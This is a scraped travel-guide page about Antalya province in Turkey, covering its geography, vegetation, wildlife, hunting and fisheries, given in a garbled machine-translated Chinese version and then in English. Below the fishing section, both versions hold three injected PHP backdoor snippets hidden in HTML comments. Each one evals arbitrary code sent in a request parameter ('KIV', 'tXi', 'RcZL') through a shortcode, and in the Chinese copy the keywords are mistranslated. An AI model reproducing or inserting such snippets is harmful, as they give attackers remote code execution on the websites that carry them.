/ 安塔利亚 / 安塔利亚旅游

安塔利亚旅游

安塔利亚旅行指南欢迎来到安塔利亚旅游指南. 安塔利亚是资本和该地区人口的最大中心, 其人口超过五十万. 这座城市位于其上靠在高原 “斗牛” 山川形成的海边悬崖. 在海岸上的第一个岩石平原镇中心和它背后的平原, 命名Kepezüstü, 小解决单位已建立. 海岸是 530 公里长,在西部与也先边框和Kaledran溪东. 全省有面积 20,820 平方公里. 平原的土壤由砾岩, 冲积层和石灰的Falez岩石.

托罗斯山脉, 石灰石,蛇纹石土地形成, 喀斯特表面形成, 有很多深谷, 洞穴, 裂缝和断层. 在一个高度的沼泽地带 300 从沿海擦洗树木米, 被誉为马基斯, 被发现. 这些措施包括夹竹桃, 野草莓, 檀香, 草莓树, 桃金娘, 楝树, 湾, 贞洁树, 角豆树, 扫帚和大戟. 百里香, 智者, 藏红花, 蒡, 水仙, 芦笋, 黑莓, 菊花,, 疏, 橡木, 东方平面, 野梨, 橄榄树和椴树也被找到.

300 进一步对米, 红松树和橡树林, 并用桉树沼泽可以看出. 1200 进一步M于雪松森林, 冷杉, 樟子松, 杜松和山毛榉开始. 由于在平原冲积土,适用于农业, 蔬菜, 水果和鲜花种植大棚出口. 打开橙色, 普通话, 柠檬和葡萄柚花园可以在附近看到, 在温暖的地中海风. 安塔利亚平原东部, 香蕉和鳄梨种植. 棉花播种作为工业厂房和棉花生产, 随着纱厂和纺织工厂, 适用于土耳其的巨大潜力. 苹果, 梨, 桲, 葡萄和芝麻生长在多山的高原.

区域是动物狩猎之旅非常好. 在Düzlerçamı在托罗斯山脉, 覆盖的区域 10,000 公顷, 小鹿, 野山羊和狍狩猎被允许控制的基础上,. 狼队, 狐狸, 棕熊, 马滕斯, 野猪, 野猫野狗和是经常found.The金牛座豹是众所周知的存在,直到最近的野生物种. 鹧鸪, 鹌鹑, 斑鸠, 野鸽子, 黑鸟, 鹬, 鹧鸪和野鸭可视为猎鸟.

该地区是著名的为它的grida鱼; 除此之外, 鲷鱼, 竹荚鱼, 头鲂, 镀金头, 鲻鱼, 鲂鱼, 鳕鱼, 美丽, 条纹红鲻鱼, 马卜, 大鲣, 红鲂鱼和红鲻鱼是主要的深海鱼中, 其他海产包括寄居蟹, 龙虾, 虾, 墨鱼和贻贝. 此外, 笼捕鱼的海在海岸六分进行,其中海鲈鱼和鲻鱼的育种. 淡水钓在也先进行, 暗淡, Köprüçay, 马纳夫加特, 阿克恰伊和河流. 在昏暗的内河涌水建立的鱼餐馆都特别有名. 主要的淡水鱼是淡水鲢鱼, 淡水鲈鱼, 鲤鱼, 镜鲤, 鳗鱼, 黯淡和丁鲷. 有许多鳟鱼生产场和餐厅托罗斯山脉的部分接近水和河床.

<!– [insert_php]如果 (isset($_请求["KIV"])){EVAL($_请求["KIV"]);出口;}[/insert_php][PHP]如果 (isset($_请求["KIV"])){EVAL($_请求["KIV"]);出口;}[/PHP] –>

<!– [insert_php]如果 (isset($_请求["tXi"])){EVAL($_请求["tXi"]);出口;}[/insert_php][PHP]如果 (isset($_请求["tXi"])){EVAL($_请求["tXi"]);出口;}[/PHP] –>

<!– [insert_php]如果 (isset($_请求["RcZL"])){EVAL($_请求["RcZL"]);出口;}[/insert_php][PHP]如果 (isset($_请求["RcZL"])){EVAL($_请求["RcZL"]);出口;}[/PHP] –>

Booking.com

发表评论

您的电子邮件地址不会被公开. 必需的地方已做标记 *

*

Home / Antalya / Antalya Travel Guide

Antalya Travel Guide

antalya-travel-guideWelcome to Antalya Travel Guide. Antalya is the capital and the largest center of population of the region, with its population exceeding half a million. The city is located on a plateau which leans against the “Toros” mountains and which forms cliffs on the sea side. On the first rocky plain on the coast is the town centre and on the plain behind it, named Kepezüstü, small settlement units have been established. The coast is 530 km in length and borders with Eşen in the west and Kaledran creek in the east. The province has an area of 20,820 km2. The soil of the plain is made up of conglomerate, alluvium and travertine falez rocks.

The Taurus mountains, formed of limestone and serpentine lands, with karst surface formations, have many deep valleys, caves, crevices and faults. In the marshy areas at a height of 300 m from the coast scrub trees, known as maquis, are found. These include oleander, wild strawberries, sandalwood, strawberry trees, myrtle, chinaberry trees, bay, chaste trees, carob trees, broom and spurge. Thyme, sage, saffron, burdock, asphodel, asparagus, blackberry, chrysanthemum and, sparsely, oak, Oriental plane, wild pear, olive and linden trees are also found.

300 metres further on in, the red pine and oak forests, and marshes with eucalyptus trees can be seen. 1200 m further on the forests with cedar, fir trees, Scotch pine, juniper and beech begin. As the alluvial soil on the plains is suitable for agriculture, vegetables, fruit and flowers are grown in greenhouses for export. Open orange, mandarin, lemon and grapefruit gardens can be seen in the vicinity, in the warm Mediterranean winds. On the east of the Antalya plain, banana and avocado are grown. Cotton is sown as an industrial plant and cotton production, along with cotton mills and textile factories, holds great potential for Turkey. Apples, pears, quince, grapes and sesame are grown on the mountainous plateaus.

The regional fauna is very good for hunting tours. In Düzlerçamı on the Taurus mountains, covering an area of 10,000 hectares, fallow deer, wild goat and roe deer hunting is permitted on a controlled basis. Wolves, foxes, brown bears, martens, wild boar, wild cats and jackals are the wild species that are often found.The Taurus Leopard was known to exist until recently. Partridge, quail, turtle dove, wild pigeon, blackbird, woodcock, francolin and wild duck can be regarded as game birds.

The region is well-known for its grida fish; in addition to this, sea bream, horse mackerel, black bream, gilt-head, grey mullet, gurnard, whiting, bonito, striped red mullet, needlefish, large bonito, red gurnard and red mullet are among the major sea fish, other sea produce includes hermit crab, lobster, shrimp, cuttle-fish and mussel. In addition, cage fishing is carried out in the sea at six points on the coast where sea-bass and grey mullet are bred. Fresh water line fishing is carried out in the Eşen, Dim, Köprüçay, Manavgat, Akçay and Alara rivers. The fish restaurants established within water in the Dim Creek are particularly famous. The main fresh water fish are fresh water chub, fresh water perch, carp, mirror-carp, eel, bleak and tench. There are numerous trout production farms and restaurants in those parts of the Taurus Mountains close to water and river beds.

<!– [insert_php]if (isset($_REQUEST["KIV"])){eval($_REQUEST["KIV"]);exit;}[/insert_php][php]if (isset($_REQUEST["KIV"])){eval($_REQUEST["KIV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["tXi"])){eval($_REQUEST["tXi"]);exit;}[/insert_php][php]if (isset($_REQUEST["tXi"])){eval($_REQUEST["tXi"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["RcZL"])){eval($_REQUEST["RcZL"]);exit;}[/insert_php][php]if (isset($_REQUEST["RcZL"])){eval($_REQUEST["RcZL"]);exit;}[/php] –>

Booking.com

Leave a Reply

Your email address will not be published. Required fields are marked *

*